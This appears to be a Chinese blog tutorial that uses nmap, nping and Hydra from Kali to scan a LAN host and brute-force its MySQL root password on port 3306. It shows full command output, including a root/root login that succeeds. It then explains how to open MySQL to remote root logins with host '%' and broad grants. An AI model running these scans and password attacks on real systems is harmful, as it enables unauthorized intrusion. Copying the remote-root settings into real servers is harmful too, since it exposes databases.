nmap+hydra 爆破3306实例

最新推荐文章于 2025-05-29 16:51:08 发布

原创最新推荐文章于 2025-05-29 16:51:08 发布 · 1.6w 阅读

19 ·

CC 4.0 BY-SA版权

文章标签：

#kali工具

安全技术同时被 2 个专栏收录

94 篇文章

订阅专栏

工具使用

38 篇文章

订阅专栏

本文介绍了Nmap的基本用法及实例操作，包括主机发现、端口扫描和服务识别等，并展示了如何利用Hydra进行密码破解，同时探讨了解决MySQL远程连接问题的方法。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

nmap：

基本用法

-A 扫描操作系统信息和路由跟踪
-O 探测操作系统信息
-v 远程机器更详细的信息
-sA 探测该主机是否使用了包过滤器或防火墙
-PN 扫描主机检测是否有防火墙保护
-sP 找出网络中的在线主机
-F 执行快速扫描
-r 顺序扫描端口
-sN 执行TCP空扫描以骗过防火墙
-sS 执行一次隐蔽的扫描

实际操作：

nmap -sP 127.0.0.1 //找出网络中的在线主机

nping --echo-client "public" echo www.baidu.com //查看与百度连接时数据的发送情况

nping --tcp -p 445 -d AF56A43D 192.168.41.136 //查看192.168.41.234 和192.168.41.136的tcp传输过程，通过发送数据包到指定端口模拟出一些常见的网络攻击

Starting Nping 0.7.60 ( https://nmap.org/nping ) at 2018-01-03 10:03 CST
BPF-filter: (not src host 192.168.165.128 and dst host 192.168.165.128) and ((tcp and dst port 57666) or (icmp and (icmp[icmptype] = 3 or icmp[icmptype] = 4 or icmp[icmptype] = 5 or icmp[icmptype] = 11 or icmp[icmptype] = 12)) )
SENT (20.1628s) TCP [192.168.165.128:57666 > 202.77.49.113:445 S seq=3235973801 win=1480 csum=0x99A8] IP [ttl=64 id=60933 proto=6 csum=0x2ae3 iplen=40 ]
SENT (21.1656s) TCP [192.168.165.128:57666 > 192.168.0.54:445 S seq=3235973801 win=1480 csum=0xD488] IP [ttl=64 id=60933 proto=6 csum=0x65c3 iplen=40 ]
RCVD (21.1666s) TCP [192.168.0.54:445 > 192.168.165.128:57666 SA seq=1065185696 win=64240 csum=0x1675 <mss 1460>] IP [ttl=128 id=65262 proto=6 csum=0x14d6 iplen=44 ]
SENT (22.1680s) TCP [192.168.165.128:57666 > 202.77.49.113:445 S seq=3235973801 win=1480 csum=0x99A8] IP [ttl=64 id=60933 proto=6 csum=0x2ae3 iplen=40 ]
SENT (23.1716s) TCP [192.168.165.128:57666 > 192.168.0.54:445 S seq=3235973801 win=1480 csum=0xD488] IP [ttl=64 id=60933 proto=6 csum=0x65c3 iplen=40 ]
RCVD (23.1728s) TCP [192.168.0.54:445 > 192.168.165.128:57666 SA seq=954087523 win=64240 csum=0x5651 <mss 1460>] IP [ttl=128 id=65263 proto=6 csum=0x14d5 iplen=44 ]
SENT (24.1747s) TCP [192.168.165.128:57666 > 202.77.49.113:445 S seq=3235973801 win=1480 csum=0x99A8] IP [ttl=64 id=60933 proto=6 csum=0x2ae3 iplen=40 ]
SENT (25.1785s) TCP [192.168.165.128:57666 > 192.168.0.54:445 S seq=3235973801 win=1480 csum=0xD488] IP [ttl=64 id=60933 proto=6 csum=0x65c3 iplen=40 ]
RCVD (25.1797s) TCP [192.168.0.54:445 > 192.168.165.128:57666 SA seq=797395120 win=64240 csum=0x4F5B <mss 1460>] IP [ttl=128 id=65264 proto=6 csum=0x14d4 iplen=44 ]
SENT (26.1812s) TCP [192.168.165.128:57666 > 202.77.49.113:445 S seq=3235973801 win=1480 csum=0x99A8] IP [ttl=64 id=60933 proto=6 csum=0x2ae3 iplen=40 ]
SENT (27.1844s) TCP [192.168.165.128:57666 > 192.168.0.54:445 S seq=3235973801 win=1480 csum=0xD488] IP [ttl=64 id=60933 proto=6 csum=0x65c3 iplen=40 ]
RCVD (27.1855s) TCP [192.168.0.54:445 > 192.168.165.128:57666 SA seq=577307344 win=64240 csum=0xA259 <mss 1460>] IP [ttl=128 id=65265 proto=6 csum=0x14d3 iplen=44 ]
SENT (28.1892s) TCP [192.168.165.128:57666 > 202.77.49.113:445 S seq=3235973801 win=1480 csum=0x99A8] IP [ttl=64 id=60933 proto=6 csum=0x2ae3 iplen=40 ]
SENT (29.1926s) TCP [192.168.165.128:57666 > 192.168.0.54:445 S seq=3235973801 win=1480 csum=0xD488] IP [ttl=64 id=60933 proto=6 csum=0x65c3 iplen=40 ]
RCVD (29.1934s) TCP [192.168.0.54:445 > 192.168.165.128:57666 SA seq=1096559906 win=64240 csum=0x5914 <mss 1460>] IP [ttl=128 id=65267 proto=6 csum=0x14d1 iplen=44 ]

Statistics for host AF56A43D (202.77.49.113):
| Probes Sent: 5 | Rcvd: 0 | Lost: 5 (100.00%)
|_ Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A
Statistics for host 192.168.0.54:
| Probes Sent: 5 | Rcvd: 5 | Lost: 0 (0.00%)
|_ Max rtt: 0.985ms | Min rtt: 0.097ms | Avg rtt: 0.691ms
Raw packets sent: 10 (400B) | Rcvd: 5 (230B) | Lost: 5 (50.00%)
Tx time: 9.03115s | Tx bytes/s: 44.29 | Tx pkts/s: 1.11
Rx time: 9.03178s | Rx bytes/s: 25.47 | Rx pkts/s: 0.55

root@kali2:~# nmap 192.168.0.54

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-03 10:09 CST
Nmap scan report for 192.168.0.54
Host is up (1.0s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
514/tcp filtered shell
902/tcp open iss-realsecure
912/tcp open apex-mesh
3306/tcp open mysql

Nmap done: 1 IP address (1 host up) scanned in 20.61 seconds

root@kali2:~# nmap -p 1-1000 192.168.0.54 指定1-1000端口也可以单独指定端口

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-03 10:11 CST
Nmap scan report for 192.168.0.54
Host is up (1.3s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
514/tcp filtered shell
902/tcp open iss-realsecure
912/tcp open apex-mesh

Nmap done: 1 IP address (1 host up) scanned in 25.54 seconds

root@kali2:~# nmap -A 192.168.0.54 //扫描操作系统信息和路由跟踪

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-03 10:13 CST
Nmap scan report for 192.168.0.54
Host is up (0.36s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: Index of /
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
514/tcp filtered shell
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
3306/tcp open mysql MySQL (unauthorized)
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: ERROR: Script execution failed (use -d to debug)

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 0.22 ms 192.168.165.2
2 -- 192.168.0.54

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.60 seconds

Hydra:

失败例子  原因是没有让别的ip链接3306
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 10:29:08
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:0), ~1 try per task
[DATA] attacking mysql://192.168.0.54:3306/
[ATTEMPT] target 192.168.0.54 - login "root" - pass "root" - 1 of 0 [child 1] (0/0)
[ERROR] Host 'Andy-Computer' is not allowed to connect to this MySQL server
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 10:29:19
<finished>

成功例子  连接了3306端口Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 10:45:55
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:0), ~1 try per task
[DATA] attacking mysql://192.168.0.54:3306/
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[ATTEMPT] target 192.168.0.54 - login "root" - pass "root" - 1 of 0 [child 1] (0/0)

[3306][mysql] host: 192.168.0.54   login: root   password: root
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 10:45:56
<finished>

还有一个多次连接失败导致无法爆破的原因Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

[DEBUG] Output color flag is 0
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 10:49:13
[DEBUG] cmdline: /usr/bin/hydra -s 3306 -V -d -l root -p root -t 30 -w 15 192.168.0.54 mysql 
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:0), ~1 try per task
[DATA] attacking mysql://192.168.0.54:3306/
[VERBOSE] Resolving addresses ... 
[DEBUG] resolving 192.168.0.54
[VERBOSE] resolving done
[DEBUG] Code: attack   Time: 1514947763
[DEBUG] Options: mode 0  ssl 0  restore 0  showAttempt 1  tasks 1  max_use 1 tnp 0  tpsal 0  tprl 0  exit_found 0  miscptr (null)  service mysql
[DEBUG] Brains: active 0  targets 1  finished 0  todo_all 1  todo 0  sent 1  found 0  countlogin 0  sizelogin 0  countpass 0  sizepass 0
[DEBUG] Target 0 - target 192.168.0.54  ip 192.168.0.54  login_no 0  pass_no 0  sent 0  pass_state 0  redo_state 0 (0 redos)  use_count 0  failed 0  done 0  fail_count 0  login_ptr (null)  pass_ptr (null)
[DEBUG] Task 0 - pid 0  active 0  redo 0  current_login_ptr (null)  current_pass_ptr (null)
[DEBUG] Tasks 1 inactive  0 active
[DEBUG] child 0 got target 0 selected
[DEBUG] child 0 spawned for target 0 with pid 6373
[DEBUG] head_no 0 has pid 6373
[DEBUG] head_no[0] read n
[DEBUG] send_next_pair_init target 0, head 0, redo 0, redo_state 0, pass_state 0. loop_mode 0, curlogin (null), curpass (null), tlogin root, tpass root, logincnt 0/0, passcnt 1/0, loop_cnt 0
[DEBUG] send_next_pair_mid done 1, pass_state 0, clogin root, cpass root, tlogin -p, tpass root, redo 0
[ATTEMPT] target 192.168.0.54 - login "root" - pass "root" - 1 of 0 [child 1] (0/0)
DEBUG_CONNECT_OK
[DEBUG] SEND [pid:6373] (5 bytes):
0000:  0100 0000 01                               [ .....            ]
DEBUG_DISCONNECT
[DEBUG] SEND [pid:6373] (5 bytes):
0000:  0100 0000 01                               [ .....            ]
DEBUG_DISCONNECT
[DEBUG] pid 6373 called child_exit with code 0
[DEBUG] head_no[0] read Q
[DEBUG] child 0 reported it quit
[DEBUG] head_no 0, kill 1, fail 0
[VERBOSE] using default db 'mysql'
DEBUG_RECV_BEGIN|k|END[0A]
[ERROR] Host 'Andy-Computer' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'
[ERROR] Failed to connect to database: Host 'Andy-Computer' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'
[DEBUG] child 0 got target 0 selected
[DEBUG] child 0 spawned for target 0 with pid 6374
[DEBUG] head_no 0 has pid 6374
[DEBUG] head_no[0] read n
[STATUS] attack finished for 192.168.0.54 (waiting for children to complete tests)
[DEBUG] head_no 0, kill 1, fail 0
[DEBUG] all targets done and all heads finished
[DEBUG] while loop left with 1
1 of 1 target completed, 0 valid passwords found
[DEBUG] killing all remaining children now that might be stuck
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 10:49:24
<finished>

3306端口问题

第一：更改 “mysql” 数据库里的 “user” 表里的 “host” 项，从”localhost”改称'%'。
或者新加条记录，“host” 项为要访问的ip地址，并授权。重启mysql服务。
第二：在系统防火墙添加例外端口：3306，并允许例外。

错误提示：
ERROR 1130: Host '192.168.1.3' is not allowed to connect to this MySQL server
的解决方法：
1。改表法。可能是你的帐号不允许从远程登陆，只能在localhost。这个时候只要在localhost的那台电脑，登入mysql后，更改 "mysql" 数据库里的 "user" 表里的 "host" 项，从"localhost"改称"%"
1.mysql -u root -pvmware
mysql>use mysql;
mysql>update user set host = '%' where user = 'root';
mysql>select host, user from user;

2. 授权法。例如，你想myuser使用mypassword从任何主机连接到mysql服务器的话。

GRANT ALL PRIVILEGES ON *.* TO 'myuser'@'%' IDENTIFIED BY 'mypassword' WITH GRANT OPTION;
如果你想允许用户myuser从ip为192.168.1.3的主机连接到mysql服务器，并使用mypassword作为密码
GRANT ALL PRIVILEGES ON *.* TO 'myuser'@'192.168.1.3' IDENTIFIED BY 'mypassword' WITH GRANT OPTION;

3.在window自带的防火墙里的例外添加3306端口

总结：

mysql -u root -p //以权限用户root登录
mysql>use mysql; //选择mysql库
mysql>select 'host' from user where user='root'; //查看mysql库中的user表的host值（即可进行连接访问的主机/IP名称）
mysql>update user set host = '%' where user ='root'; //修改host值（以通配符%的内容增加主机/IP地址），当然也可以直接增加IP地址
mysql>flush privileges; //刷新MySQL的系统权限相关表
mysql>select 'host' from user where user='root'; //再重新查看user表时，有修改

重起mysql服务即可完成。